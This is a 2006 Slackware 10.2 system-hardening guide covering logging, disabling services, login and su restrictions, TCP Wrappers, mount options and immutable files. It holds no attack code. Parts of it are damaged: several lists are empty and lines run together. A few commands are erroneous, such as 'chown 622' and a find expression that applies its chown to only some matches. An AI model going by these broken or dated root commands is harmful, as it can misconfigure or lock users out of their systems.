Cochise Linux Users Group
Home > Linux  

Slackware System Hardening
Copyright (c) 2002, 2005, 2006 Jeffrey Denton

Written by Jeffrey Denton <> 2 September 2006
Version - 0.7.1

This is written for:

$ cat /etc/slackware-version
Slackware 10.2.0

This is a list of some of the steps I take to improve the security on my Slackware systems. It is by no means a complete list of everything that is possible. You can either do all of the things listed here, or you can choose the ones you feel would help secure your system.

WARNING:    Hardening a system is a compromise between security

            and usability.  Some of the things I do would adversely
            affect the usability of your system and may very well
            break things.  Please have one of the following on hand
            just in case you lock yourself out of your system:
                Tom's Rootboot -
                The "Live" CD that comes with the official
                version of Slackware
                The Slackware Install CDs
            You should make a backup of anything that you feel is
            important, would be hard to replace, or that you simply
            could not do without BEFORE implementing anything listed
            If you don't understand what a setting or configuration
            is doing, don't use it on your system.
            The contents of this document is only meant to be used
            on Slackware Linux. 
            Some of the settings are redundant (defense in depth) or 
            may conflict.       
            You have been warned.
  • The settings assume that only one user is on the system, "dentonj",          adjust as necessary.     
  • Associated man pages are listed for further information     
  • I will comment this document if I ever get around to it     
  • This is still a draft as there are many TODO items.

----[ Keep Current ]----

    To subscribe to the Slackware Security mailing list, email:

    with the phrase "subscribe slackware-security" in the body of the email.

----[ Logging ]----


    /usr/sbin/syslogd -m 10 -r -h
    /usr/sbin/klogd -c 3 -x -p

    root@darkstar:~# /etc/rc.d/rc.syslog restart

    The "-r" options enables the system to receive syslog messages from the
    remote hosts. The "-h" option allows syslog to forward messages it
    receives from remote hosts. The allows syslog messages to be logged on
    several systems for redundancy. Syslog messages that are sent over the
    network are not encrypted and can be easily captured. Watch out for syslog
    forwarding loops when using both "-r" and "-h".     

    Opens UDP port 514.

    man syslogd
    man klogd


    # Log everything to a file
    *.*                         - /var/log/messages

    # Log everything to a tty (Ctrl-Alt-F12)     *.*                         /dev/tty12

    # Log everything to a log host
    *.*                         @

    # Display emergencies to everyone using wall     *.=emerg                    *

    # Send alerts directly to the user's terminals     *.=alert                    root,dentonj     

    root@darkstar:~# /etc/rc.d/rc.syslog restart

    man syslogd
    man syslog.conf

    rotate 26

    Make sure you have enough hard drive space to store 6 months worth of logs.     You really should be moving the logs off of the system.     

    man logrotate


    /var/log/cron /var/log/debug /var/log/maillog /var/log/messages
    /var/log/secure /var/log/spooler /var/log/sulog /var/log/syslog {

                create 0640 root root
                        /bin/kill -HUP `cat /var/run/ \
                        2> /dev/null || true`


    man logrotate


     # Setup the /etc/motd to reflect the current kernel level:
    # echo "$(/bin/uname -sr)." > /etc/motd

    man motd

/etc/motd, /etc/, /boot/boot_message.txt:

    Unauthorized access prohibited; all access and activities not
    explicitly authorized by the administrator are unauthorized.
    All activities are monitored and logged. There is no privacy
    on this system. Unauthorized access and activities or any
    criminal activity will be reported to appropriate authorities.


"You seem to be lost. Please return to your little corner of the Internet."

    root@darkstar:~# lilo -v -p

    If lilo returns an error, try to determine what the problem is and rerun
    lilo before you reboot the system. Otherwise, you may end up with a
    system that doesn't boot properly.

    man issue
    man motd

    # Log icmp packets to syslog
    /usr/sbin/icmpinfo -vvv -s -l

    man icmpinfo


    Account processing is turned on by /etc/rc.d/rc.M. However, the log file doesn't exist.

    root@darkstar:~# touch /var/log/pacct

    man ac
    man 2 acct
    man 5 acct
    man accton
    man sa
    man lastcomm

    Increase logging in cron.

    /usr/sbin/crond -l7 >> /var/log/cron 2>&1

    man crond

    The btmp log file contains all of the failed login attempts. The command
    lastb lists the contents of the log file.

    root@darkstar:~touch /var/log/btmp
    root@darkstar:~ chmod --reference=/var/log/wtmp /var/log/btmp
    root@darkstar:~ chown --reference=/var/log/wtmp /var/log/btmp
    root@darkstar:~ ln -s /usr/bin/last /usr/bin/lastb
    root@darkstar:~# lastb

    Users that try to login by entering their password first will end up with
    it being logged in /var/log/btmp and displayed by lastb.

    man last

----[ Disable Daemons/Close Ports ]----


    The following are running by default:

      time - TCP port 37
      time - UDP port 37
      auth - TCP port 113
      comsat - UDP port 512

    Comment out the lines of the services that you don't need.

    root@darkstar:~ grep -v "^" /etc/inetd.conf

    man inetd
    man in.comsat
    man in.identd
    man grep

    root@darkstar:~ /etc/rc.d/rc.inetd stop
    root@darkstar:~ chmod a-x /etc/rc.d/rc.inetd

    man inetd
    man chmod

    defautserverargs="-nolisten tcp"
    Closes TCP port 6000+n, where n is $DISPLAY (the default is 0).

    man Xserver

    :0 local /usr/X11R6/bin/X -nolisten tcp

    Closes TCP port 6000.     

    man Xserver
    man xdm

    Make sure everything is commented.

    man xdm

    exec /usr/X11R6/bin/xdm -nodaemon -udpPort 0

    Closes UDP port 177.     

    man xdm

    use-syslog = yes
    no-listen = tcp

    Closes TCP port 7100.     

    man xfs

    Most of the rc.scripts are started here. From the script:

        "Uncomment or comment out sections depending on which
        services you site requires."

    There are two ways to stop daemons and services from being started. The
    first way is to make the script starting the daemon or service non-executable

        chmod 600 /etc/rc.d/rc.bind

    The second way is to comment out the sections of this script that starts     the daemon or service:

    Lines 100-103:

        # Start the BIND name server daemon:
        # if [ -x /etc/rc.d/rc.bind ]; then
        #   /etc/rc.d/rc.bind start
        # fi

    Or you can do both. Using both methods is redundant. However, using both
    methods would keep daemons from accidentally being started at the next
    reboot if you happen to get sloppy with a chmod command. Some daemons will
    not start by default because their configuration files are either not
    present or not setup properly.

    Comment out the following lines:

    Lines 20 - 53: Disable mounting of NFS filesystems
    Lines 58 - 60: Disable RPC portmapper
    Lines 63 - 68: Disable mount of SMB filesystems
    Lines 90 - 92: Disable inetd
    Lines 101 - 103: Disable BIND
    Lines 106 - 108: Disable NIS
    Lines 115 - 117: Disable NFS

    Comment out the following lines:     

    Lines 103 - 105: Disable dnsmasq
    Lines 108 - 114: Disable CUPS and lpd
    Lines 117 - 119: Disable netatalk
    Lines 160 - 162: Disable atd
    Lines 194 - 196: Disable saslauthd
    Lines 199 - 201: Disable sendmail
    Lines 205 - 212: Disable APM and ACPI
    Lines 230 - 232: Disable HP Officejet
    Lines 235 - 237: Disable MySQL
    Lines 240 - 242: Disable Apache
    Lines 224 - 226: Disable Samba
    Lines 234 - 236: Disable SystemV init scripts

    Comment out the following lines:

    Lines 16 - 22: Disable hotplug
    Lines 39 - 43: Disable udev
    Lines 192 - 196: Disable isapnp
    Lines 292 - 294: Disable SystemV init scripts

    Advanced Configuration and Power Interface event daemon

    root@darkstar:~ /etc/rc.d/rc.acpid stop
    root@darkstar:~ chmod 600 /etc/rc.d/rc.acpid

    This daemon doesn't open any ports.

    Advanced Linux Sound Architecture

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.alsa

    This daemon doesn't open any ports.


    root@darkstar:~ /etc/rc.d/rc.atalk stop
    root@darkstar:~ chmod 600 /etc/rc.d/rc.atalk

    Closes TCP port 548.


    root@darkstar:~ /etc/rc.d/rc.bind stop
    root@darkstar:~ chmod 600 /etc/rc.d/rc.bind

    Closes TCP ports 53 and 953.
    Closes UDP ports 53 and 32768.

    Common UNIX Printing System

    root@darkstar:~ /etc/rc.d/rc.cups stop
    root@darkstar:~ chmod 600 /etc/rc.d/rc.cups

    Closes TCP and UDP port 631.

    A lightweight DHCP and caching DNS server

    root@darkstar:~ /etc/rc.d/rc.dnsmasq stop
    root@darkstar:~ chmod 600 /etc/rc.d/rc.dnsmasq

    Closes TCP and UDP port 53.

    General Purpose Mouse

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.gpm

    This daemon doesn't open any ports.

    Linux hotplugging support scripts

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.hotplug

    This daemon doesn't open any ports.

    Apache webserver

    root@darkstar:~ /etc/rc.d/rc.httpd stop
    root@darkstar:~ chmod 600 /etc/rc.d/rc.httpd

    Closes TCP port 80.

    Configures network interfaces

    Make any changes in /etc/rc.d/rc.inet1.conf.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.inet1

    The Internet daemon

    root@darkstar:~ /etc/rc.d/rc.inetd stop
    root@darkstar:~ chmod 600 /etc/rc.d/rc.inetd

    Closes TCP ports 37 and 113 (by default).     Closes UDP ports 37 and 512 (be default).

    The MySQL server daemon

    By default, mysqld will not start. Read the /etc/rc.d/rc.mysqld file for     details on how to start the daemon.

    The script prevents incoming network connections by default with the     "--skip-networking" option. If this option is commented out, TCP port     3306 will be opened.     

    This daemon doesn't open any ports by default.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.mysqld

    The kfnsd NFS daemon

    By default, the deamon will not start because the file /etc/exports is not     configured properly.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.nfsd

    The RPC portmapper

    This script is started by /etc/rc.d/rc.nfsd. Since the file /etc/exports     is not configured properly by default, this damon will not start.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.rc.portmap

    The Samba SMB file/print server

    By default, the daemon will not start because the file /etc/samba/smb.conf     is not present.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.samba

    Some plaintext authentication thingy.

    root@darkstar:~ /etc/rc.d/rc.saslauthd stop
    root@darkstar:~ chmod 600 /etc/rc.d/rc.saslauthd


    root@darkstar:~ /etc/rc.d/rc.sendmail stop
    root@darkstar:~ chmod 600 /etc/rc.d/rc.sendmail

    Closes TCP ports 25 and 587.

    The Secure Shell Server

    root@darkstar:~ /etc/rc.d/rc.sshd stop
    root@darkstar:~ chmod 600 /etc/rc.d/rc.sshd

    Closes TCP port 22.

    The system logging daemon

    If the "-r" option is used, UDP port 514 is opened.

    This daemon doesn't open any ports by default.

    root@darkstar:~# chmod 600 /etc/rc.d/rc.syslog

    "This file provides basic compatibility with SystemV style startup scripts."

    Unless you have installed a daemon that requires the use of SystemV
    style startup scripts, there is no need for it to be executable.

    root@darkstar:~# chmod 600 /etc/rc.d/rc.sysvinit

    "udev provides a dynamic device directory containing only the files for
    actually present devices. It creates and removes device node files
    usually located in the /dev directory."

    This is part of the hotplug subsystem.

    This daemon doesn't open any ports.

    root@darkstar:~# chmod 600 /etc/rc.d/rc.udev

    man udev

    This file holds the configuration settings used by /etc/rc.d/rc.wireless.
    The file may hold encryption keys in plain text. Make sure that users
    are not able read this file (the default setting).

    root@darkstar:~# chmod 600 /etc/rc.d/rc.wireless.conf

    The Network Information Service

    The contents of this file is commented out by default.

    root@darkstar:~# chmod 600 /etc/rc.d/rc.yp

----[ Limit Access ]----

    chmod 1733 /tmp /var/tmp

    Prevents users for looking at the contents of those directories. It still
    allows them to create, access, and modify files in those directories if
    they know the actual file name. This does not stop users from running
    executables in /tmp.

    dentonj@darkstar:~$ ls -ld /tmp
    drwx-wx-wt 5 root root 4096 2001-06-27 12:54 /tmp/     dentonj@darkstar:~$ cp /bin/date /tmp/test     dentonj@darkstar:~$ /tmp/test
    Thu Jun 27 12:55:00 MST 2001
    dentonj@darkstar:~$ ls /tmp
    ls: /tmp: Permission denied

    man chmod

    chmod 1733 /tmp/.ICE-unix
    chmod 1733 /tmp/.X11-unix

    Don't let everyone have read access to utmp:

    chmod 660 /var/run/utmp

    man utmp
    man chmod

    # mandatory - enter a password with every boot
    # restricted - enter a password only when a boot time parameter
    # is used (e.g. - "linux single")
    # Pick one

    # Use the "-p" option with the lilo command to store the hashed password
    # in a separate file

    menu-title="Unauthorized Access Prohibited"     message=/boot/boot_message.txt

    root@darkstar:~ lilo -v -p
    root@darkstar:~ chmod go-rwx /etc/lilo.conf

    Using the setting 'password=""' and then the '-p' option with lilo will
    prompt you to enter a pass phrase while lilo is running. The pass phrase
    is hashed and stored in /etc/lilo.conf.shs. The man page for lilo claims
    that the hashed pass phrase is stored in /etc/lilo.conf.crc. Either way,
    it's better than having the password listed in /etc/lilo.conf in plain
    text. The configuration options above will require the password to be
    entered whenever the system boots. You may not want to use the "mandatory"
    setting if uptime is important or when you normally only access the system
    remotely. In these cases, use "restricted" instead.

    man lilo
    man lilo.conf

    +:root dentonj:LOCAL

    Only root and dentonj can login locally. This does not affect logging in
    via ssh.     

    Error generated: "Login incorrect"     

    man login.access


    FAIL_DELAY                  20
    DIALUPS_CHECK_ENAB          no
    LOG_UNKFAIL_ENAB            yes
    LOG_OK_LOGINS               yes
    SULOG_FILE                  /var/log/sulog
    ISSUE_FILE                  /etc/issue
    PASS_MAX_DAYS               90
    PASS_MIN_LEN                12
    CHFN_RESTRICT               frwh
    DEFAULT_HOME                no
    #NO_PASSWORD_CONSOLE        null
    GETPASS_ASTERISKS           5

    root@darkstar:~# touch /var/log/sulog     

    man login.defs
    man dpasswd




    root@darkstar:~ usermod -g users -G wheel dentonj
    root@darkstar:~ chmod go-rwx /etc/suauth

    Only dentonj is allowed to switch users. Or, only members of the wheel     group can switch users.

    Error generated: "Access to su to that account DENIED."

                     "You are not authorized to su root"

    man suauth


    tty1,tty2,tty3,tty4,tty5,tty6:root,dentonj:Al0000-2400     *:*:

    root@darkstar:~# chmod go-rwx /etc/porttime

    The third field specifies when someone can login. If the field is empty,
    then the user is not able to login. The "*:*:" entry is a default deny
    rule to catch everyone not already listed. The third field lists the times
    that a user is allowed to login. If that field is empty, the user is not
    allowed to login.

    The daemon logoutd is normally run to enforce the login time restrictions
    listed in /etc/porttime.

    Error generated: "Invalid login time"     

    man porttime


    # Enforce login time restrictions set in /etc/porttime

    if [ -x /usr/sbin/logoutd ]; then

    man logoutd


    dentonj C0L1

    root@darkstar:~# chmod go-rwx /etc/limits

    The setting "* L0" is a default rule for anyone not previously listed. The
    number of logins permitted is set to zero, which means anyone not
    previously listed is not allowed to login. This does not affect root.

    Error generated: "Too many logins."

    man limits

    Allowing users to run different shells allows them to bypass any security
    restrictions set on their login shell.     

    Delete the following:


    root@darkstar:~ removepkg ash
    root@darkstar:~ removepkg ksh93
    root@darkstar:~ removepkg tcsh
    root@darkstar:~ removepkg zsh

    man shells

    root@darkstar:~ faillog -u dentonj -m 10
    root@darkstar:~ faillog -a

    Don't set faillog for root. This is one of the few settings that can     actually stop root from logging in. Using faillog can cause a denial of     service if the maximum number of logins is reached. Use faillog with     caution.

    Error generated: "Login incorrect"

    man faillog

    Delete unused accounts.

    root@darkstar:~ find / -user adm -ls
    root@darkstar:~ userdel adm

    Repeat for the following:


    The accounts "halt" and "shutdown" don't work by default. The account     "sync" isn't needed.    

        root@darkstar:~ su halt
        halt: must be superuser.         root@darkstar:~ su shutdown
        shutdown: you must be root to do that!         root@darkstar:~ userdel halt
        root@darkstar:~ userdel shutdown
        root@darkstar:~# userdel sync

    Add /bin/false as the shell to the following:


    Error generated: darkstar login: test

                      Password: *************************
                      Linux 2.4.32
                      Last login: Wed Jun 27 20:23:42 -0700 2001 on tty2
                      No mail.
                      Welcome to Linux 2.4.32 (tty2)
                      darkstar login:

    Password aging:
        Note:  Don't use this if you like to make the /etc/passwd and the 
        /etc/shadow files immutable (chattr +i ...).  It gets ugly...  If you 
        let the password expire, you will not be able to login until you reset 
        the password.  But if the /etc/shadow file is immutable and cannot be 
        changed, then you will not be able to login.  To fix the problem, you 
        would have to boot tomsrtbt or a Linux boot CD, mount the hard drive 
        partition where /etc is located, and remove the immutable attribute 
        from /mnt/etc/shadow (chattr -i ...).
        root@darkstar:~ passwd -x 90 -w 7 root
        root@darkstar:~ passwd -x 90 -w 7 -i 30 dentonj

    root@darkstar:~ for i in `cat /etc/passwd | awk -F: '{print $1}'`; do     > passwd -S $i
    > done
    root@darkstar:~ pwck     

    man 1 passwd
    man 5 passwd
    man find
    man userdel
    man false
    man pwck

    root@darkstar:~ find / -group adm -ls     root@darkstar:~ groupdel adm

    Repeat for the following:


    root@darkstar:~# grpck

    Removing accounts may create a long list of files that no longer belong to
    any user or group. If you are interested what the files are:

    root@darkstar:~# find / -nouser -o -nogroup -ls > unowned.out

    To change the ownership of the files:

    root@darkstar:~# find / -nouser -o -nogroup -exec chown root.root {} \;

    man group
    man find
    man groupdel
    man grpck
    man chown

    Defaults    rootpw
    Defaults    ! root_sudo
    Defaults    ignore_dot
    Defaults    tty_tickets
    Defaults    requiretty
    Defaults    path_info
    Defaults    noexec
    %wheel     ALL=(ALL)     ALL

    root@darkstar:~ groups dentonj
    root@darkstar:~ usermod -g users -G wheel dentonj     

    There are a number a security concerns when allowing users to use sudo.
    Make sure you completely read the man pages for sudo and sudoers.     

    There are generally two approaches when configuring sudo. The first is to
    allow the user to run any command. This is essentially giving them su
    access to root. If you are going to use the first approach, you should
    require the user to enter the root password every time they use sudo.
    Two passwords would need to be entered to gain root access.

    The second approach is to configuring sudo is to only allow a limited
    number of commands to be run. If you are going to use the second approach,
    there are a few commands that you don't want to allow the user to run.
    These commands can be abused to give the user full access to the system.
    Make sure you don't add the following or those listed in the Shell Escapes
    section below to the /etc/sudoers file:


    This list should be much longer.

    man sudo
    man sudoers
    man visudo
    man groups
    man usermod     

    This file is used to deny anyone listed from being able to log into the
    local ftp server. Add the following:

    Add all system accounts that are present in /etc/passwd.     

    man ftpusers

    nospoof on
    spoofalert on
    spoof warn

    man host.conf

    TCP Wrappers

    all:local:banners /etc/banners:allow     sshd:192.168.1.:banners /etc/banners:allow     sendmail:all:banners /etc/banners:allow     all:paraniod:spawn /usr/bin/logger "%d deny paraniod %c %p %a %h %u" \

        :banners /etc/banners:deny
    all:all:spawn /usr/bin/logger "%d deny %c %p %a %h %u" \

        :banners /etc/banners:deny     

    From `man hosts_options`:

        banners /some/directory
               Look for a file in `/some/directory` with the same
               name as the daemon process (for example  in.telnetd
               for  the  telnet service), and copy its contents to
               the client.

    If you are using any of the services listed below, make sure you add an     allow rule for it. If you want a different banner for a particular     service, delete the symlink and create a text file with the same name.     

    root@darkstar:~ mkdir /etc/banners && cd /etc/banners     root@darkstar:/etc/banners ln -s ../ afpd     root@darkstar:/etc/banners ln -s ../ imapd     root@darkstar:/etc/banners ln -s ../ in.identd     root@darkstar:/etc/banners ln -s ../ in.rexecd     root@darkstar:/etc/banners ln -s ../ in.rlogind     root@darkstar:/etc/banners ln -s ../ in.rshd     root@darkstar:/etc/banners ln -s ../ in.telnetd     root@darkstar:/etc/banners ln -s ../ popa3d     root@darkstar:/etc/banners ln -s ../ proftpd     root@darkstar:/etc/banners ln -s ../ sendmail     root@darkstar:/etc/banners ln -s ../ sshd     root@darkstar:/etc/banners ln -s ../ stunnel     root@darkstar:/etc/banners ln -s ../ vsftpd

    A command that can be used to determine which daemons use TCP Wrappers:

    root@darkstar:~# cd /usr/sbin; for i in `ls | grep -v "@$"`; do \

        echo " $i"; strings $i | grep hosts.allow; done | less

    To test the /etc/hosts.allow settings:

    root@darkstar:~ tcpdchk
    root@darkstar:~ tcpdmatch sshd localhost     root@darkstar:~# tcpdmatch sshd     root@darkstar:~# tcpdmatch sshd     

    man tcpd
    man 5 hosts_access
    man hosts_options
    man tcpdchk
    man tcpdmatch


    The only time this file will match is when /etc/hosts.allow is     misconfigured.

    all:all:spawn /usr/bin/logger "Check hosts.allow - %d deny %c %p %a %h %u" \

        :banners /etc/banners:deny

    man tcpd
    man 5 hosts_access
    man hosts_options

    Modify xdm-config and create Xstartup and Xreset so that entries can be     added to utmp and wtmp when a user logs in.

    man xdm

    DisplayManager._0.startup:/usr/X11R6/lib/X11/xdm/Xstartup     DisplayManager._0.reset:/usr/X11R6/lib/X11/xdm/Xreset         DisplayManagerauthorize:    true
authName:     XDM-AUTHORIZATION-1 MIT-MAGIC-COOKIE-1     DisplayManager.requestPort:0

    man xdm

    # Xstartup
    # This program is run as root after the user is verified     #
    # man xdm
    if [ -f /etc/nologin ]; then

        xmessage -file /etc/nologin -timeout 30 -center
        exit 1

    sessreg -a -l $DISPLAY -x /usr/X11R6/lib/X11/xdm/Xserver $LOGNAME     /usr/X11R6/lib/X11/xdm/GiveConsole
    exit 0

    root@darkstar:~# chmod a+x /etc/X11/xdm/Xstartup


    # Xreset
    # This program is run as root after the session ends     #
    # man xdm
    sessreg -d -l $DISPLAY -x /usr/X11R6/lib/X11/xdm/Xservers $LOGNAME     /usr/X11R6/lib/X11/xdm/TakeConsole

    root@darkstar:~# chmod a+x /etc/X11/xdm/Xreset


    xlogingreeting:            Unauthorized Access Prohibited
    xloginallowRootLogin:      false
    xlogin*allowNullPasswd:     false
    man xdm

    Comment the following lines:

    # If you are using Motif, you probably want these.     #property MOTIFDEFAULT_BINDINGS root    ar iw

    #property MOTIFDRAG_WINDOW        root    ar iw
    #property MOTIFDRAG_TARGETS       any     ar iw
    #property MOTIFDRAG_ATOMS         any     ar iw
    #property MOTIFDRAG_ATOM_PAIRS    any     ar iw

    # If you are running CDE you also need these

    #property MOTIFWM_INFO         root    arw
    #property TT_SESSION             root    irw
    #property WM_ICON_SIZE           root    irw
    #property "SDT Pixel Set"        any     irw

    # The next two rules let xwininfo -tree work when untrusted.     #property WM_NAME        any     ar

    # Allow read of WM_CLASS, but only for windows with WM_NAME.     # This might be more restrictive than necessary, but demonstrates     # the <required property> facility, and is also an attempt to     # say "top level windows only."
    #property WM_CLASS     WM_NAME ar

    # These next three let xlsclients work untrusted. Think carefully     # before including these; giving away the client machine name and command     # may be exposing too much.

    #property WM_STATE                  WM_NAME ar
    #property WM_CLIENT_MACHINE         WM_NAME ar
    #property WM_COMMAND                WM_NAME ar

    # To let untrusted clients use the standard colormaps created by     # xstdcmap, include these lines.
    #property RGB_DEFAULT_MAP root    ar

    #property RGB_BEST_MAP      root    ar
    #property RGB_RED_MAP       root    ar
    #property RGB_GREEN_MAP     root    ar
    #property RGB_BLUE_MAP      root    ar
    #property RGB_GRAY_MAP      root    ar

    # To let untrusted clients use the color management database created     # by xcmsdb, include these lines.

    #property XDCCC_LINEAR_RGB_CORRECTION       root    ar
    #property XDCCC_LINEAR_RGB_MATRICES         root    ar
    #property XDCCC_GRAY_SCREENWHITEPOINT       root    ar
    #property XDCCC_GRAY_CORRECTION             root    ar

    # To let untrusted clients use the overlay visuals that many vendors     # support, include this line.
    #property SERVER_OVERLAY_VISUALS    root    ar

    man Xserver

    dentonj@darkstar:~$ xhost     access control enabled, only authorized clients can connect     dentonj@darkstar:~$

    If the following line shows up:

    dentonj@darkstar:~$ xhost -localhost

    man xhost
    man Xsecurity



    ServerArgsLocal=-nolisten tcp


    less /opt/kde/share/doc/kdm/README

    Uncomment the following lines:

    chown $USER /dev/console
    exec sessreg -a -l $DISPLAY -h "`echo $DISPLAY | cut -d: -f1`" $USER

    Uncomment the following lines:

    chown root /dev/console
    chown 622 /dev/console
    exec sessreg -d -l $DISPLAY -h "`echo $DISPLAY | cut -d: -f1`" $USER

    Comment out the following lines:

    #                           #any host can get a login window
    #   CHOOSER BROADCAST       #any indirect host can get a chooser

Access Control Lists:


    man acl
    man setfacl
    man getfacl

    Comment out the following line:
    #ca::ctraltdel:/sbin/shutdown -t5 -r now

    root@darkstar:~# telinit q


    I actually don't think this is necessary. But I'm including it because
    just about every security document on Linux recommends it. It stops anyone
    from being able to reboot the system by doing a three finger salute.
    Pressing Ctrl-Alt-Del to reboot the system only works if you have physical
    access to the system. Even if you disable this feature, it doesn't stop
    someone from pulling the power cord or pressing the reset switch to force a
    reboot. Most window managers trap Ctrl-Alt-Del anyways.

    The only time that I see disabling the above line as being useful is when
    you have a Windows admin using Linux. You don't want them rebooting the
    system every time they want to lock the system or go to the Task Manager.

    Or you can use /etc/shutdown.allow to control when (not exactly by who) the
    system can be rebooted with Ctrl-Alt-Del. There are security concerns with
    using this method. Check the man page for shutdown for details.


    Add "-a" to the following line in /etc/inittab to use     /etc/shutdown.allow:

    ca::ctraltdel:/sbin/shutdown -t5 -r now -a

    root@darkstar:~# telinit q

    I like to use dumb terminals. Uncomment the following line:     s1:12345:respawn:/sbin/agetty -L ttyS0 9600 vt100

    root@darkstar:~# telinit q

    man init
    man inittab
    man initscript
    man shutdown
    man telinit


    man shutdown

    Make sure only the following are uncommented:


    man securetty

    There are several ways to set umask:
            UMASK       077
            * K077
            umask 077

    Umask controls what the initial permissions are for newly created files and
    directories. With a umask of 022, new files have the permissions of 644
    and new directories have the permissions of 755. Setting the umask to 077
    will result in new files being created with the permissions of 600 and new
    directories will have the permissions of 700.

    Using the umask of 077 will keep others from being able to access users
    files. Using a umask of 022 will allow others access to the users files
    unless the users takes the time to change the permissions. You can use
    cron to periodically remove permissions from the user's home directories.

    Setting a restrictive umask can cause problems when you commonly edit
    or create files that need to be read accessable to everyone. An example
    of files that everyone needs to be able to read are web server pages
    located in /var/www/htdocs.

    dentonj@darkstar:~$ type -a umask     

    man bash
    man umask
    man login.defs
    man limits

----[ Filesystem ]----

    /dev/hdb1   swap            swap   defaults                         0 0
    /dev/hdb5   /               ext3   defaults                         1 1
    /dev/hdb6   /var            ext3   rw,nosuid,nodev                  0 2
    /dev/hdb7   /tmp            ext3   rw,nosuid,nodev,noexec           0 2
    /dev/hdb8   /usr            ext3   ro                               0 2
    /dev/hdb9   /home           ext3   rw,nosuid,nodev                  0 0
    /dev/hda1   /mnt/windows    vfat   rw,nosuid,nodev,noexec,noauto    0 0
    /dev/hda2   /mnt/slack      ext2   rw,noauto                        0 0
    /dev/cdrom  /mnt/cdrom      auto   noauto,owner,ro                  0 0
    /dev/fd0    /mnt/floppy     auto   noauto,owner                     0 0
    devpts      /dev/pts        devpts gid=5,mode=620                   0 0
    proc        /proc           proc   defaults                         0  

    root@darkstar:~ mkdir /mnt/windows     root@darkstar:~ mkdir /mnt/slack
    root@darkstar:~ mkdir /mnt/floppy
    root@darkstar:~ mkdir /mnt/thumb

    man fstab
    man nfs
    man mount

    I use to add "noexec" to /home, but that mount option is pretty trivial to
    bypass. Besides, I like having a ~/bin directory for my scripts.

    dentonj@darkstar:~$ /lib/ ./some_executable


    Stop fsck from running every 22 boots. The new setting means fsck only
    runs every 6 months. If you would like to fsck more often, then adjust
    as necessary.

    root@darkstar:~ tune2fs -l /dev/hdb5
    root@darkstar:~ for i in hdb5 hdb6 hdb7 hdb8 hdb9; do
    > tune2fs -c 0 /dev/$i
    > done
    root@darkstar:~# tune2fs -l /dev/hdb5

    man tune2fs
    man fsck

    Make these files immutable:

        for i in `ls /etc/rc.d`; do
        chattr +i /etc/rc.d/$i
        for i in `ls /etc/apache`; do
        chattr +i /etc/apache/$i
        for i in `ls /etc/mail`; do         chattr +i /etc/mail/$i         done                  find / -type f \( -perm -4000 -o -perm -2000 \) -exec chattr +i {} \;                  chattr +i /etc/at.deny         chattr +i /etc/exports         chattr +i /etc/ftpusers         chattr +i /etc/host.conf         chattr +i /etc/hosts         chattr +i /etc/hosts.allow         chattr +i /etc/hosts.deny         chattr +i /etc/hosts.equiv         chattr +i /etc/hosts.lpd         chattr +i /etc/inetd.conf         chattr +i /etc/inittab         chattr +i /etc/lilo.conf         chattr +i /etc/login.access         chattr +i /etc/login.defs         chattr +i /etc/named.conf         chattr +i /etc/porttime         chattr +i /etc/profile         chattr +i /etc/protocols         chattr +i /etc/securetty         chattr +i /etc/services         chattr +i /etc/suauth         chattr +i /home/dentonj/.forward         chattr +i /home/dentonj/.netrc         chattr +i /home/dentonj/.rhosts         chattr +i /home/dentonj/.shosts
        less /usr/local/sbin/chkrootkit         /TROJAN         chattr +i <the commands listed in the variable TROJAN>

    This list should be much longer.

    root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr     

    man chattr

    TODO - list where is can be found and how to compile it.

    Remove the CAP_LINUX_IMMUTABLE kernel capability. This prevents the +i
    attribute from being removed. I run `lcap` from rc.local. This file is
    sourced from the file rc.M. To remove the +i attribute from a file, you'll
    have to reboot the system and go into single user mode. This is one of the
    few times when you really have to reboot Linux.

    If you only access and manage the system remotely, using lcap may cause

    Note: Do this after you are finished with configuring your system.

        /usr/local/sbin/lcap CAP_LINUX_IMMUTABLE

    root@darkstar:~ touch /tmp/test
    root@darkstar:~ chattr +i /tmp/test
    root@darkstar:~ lsattr /tmp/test
    ----i-------- /tmp/test
    root@darkstar:~ cd
    root@darkstar:~ lcap CAP_LINUX_IMMUTABLE
    root@darkstar:~ chattr -i /tmp/test
    chattr: Operation not permitted while setting flags on /tmp/test
    root@darkstar:~# lcap                         Current capabilities: 0xFFFFFCFF

       0) *CAP_CHOWN                   1) *CAP_DAC_OVERRIDE         
       2) *CAP_DAC_READ_SEARCH         3) *CAP_FOWNER               
       4) *CAP_FSETID                  5) *CAP_KILL                 
       6) *CAP_SETGID                  7) *CAP_SETUID               
       8)  CAP_SETPCAP                 9)  CAP_LINUX_IMMUTABLE      
      10) *CAP_NET_BIND_SERVICE       11) *CAP_NET_BROADCAST        
      12) *CAP_NET_ADMIN              13) *CAP_NET_RAW              
      14) *CAP_IPC_LOCK               15) *CAP_IPC_OWNER            
      16) *CAP_SYS_MODULE             17) *CAP_SYS_RAWIO            
      18) *CAP_SYS_CHROOT             19) *CAP_SYS_PTRACE           
      20) *CAP_SYS_PACCT              21) *CAP_SYS_ADMIN            
      22) *CAP_SYS_BOOT               23) *CAP_SYS_NICE             
      24) *CAP_SYS_RESOURCE           25) *CAP_SYS_TIME             
      26) *CAP_SYS_TTY_CONFIG       
        * = Capabilities currently allowed

    root@darkstar:~# chmod -R go-rwx /etc/cron.

    The system startup scripts are world readable by default.

    root@darkstar:~# chmod -R go-rwx /etc/rc.d/

    Limit access to $HOME directories:

    root@darkstar:~ chmod -R go-wrx /home/dentonj     root@darkstar:~ chmod -R go-rwx /root

    man chmod

    Limit access to logs:

    root@darkstar:~# chmod -R o-rwx /var/log

The following files should be empty if they exist:

Files that normally shouldn't exist:

Find SUID/SGID files and directories:
    root@darkstar:~ find / -type f \( -perm -4000 -o -perm -2000 \) \     > -ls > suid_files.out
    root@darkstar:~ find / -type d \( -perm -4000 -o -perm -2000 \) \     > -ls > suid_dirs.out

Find world and group writable files and directories:
    root@darkstar:~ find / -type f \( -perm -2 -o -perm -20 \) \     > -ls > write_files.out
    root@darkstar:~ find / -type d \( -perm -2 -o -perm -20 \) \     > -ls > write_dirs.out

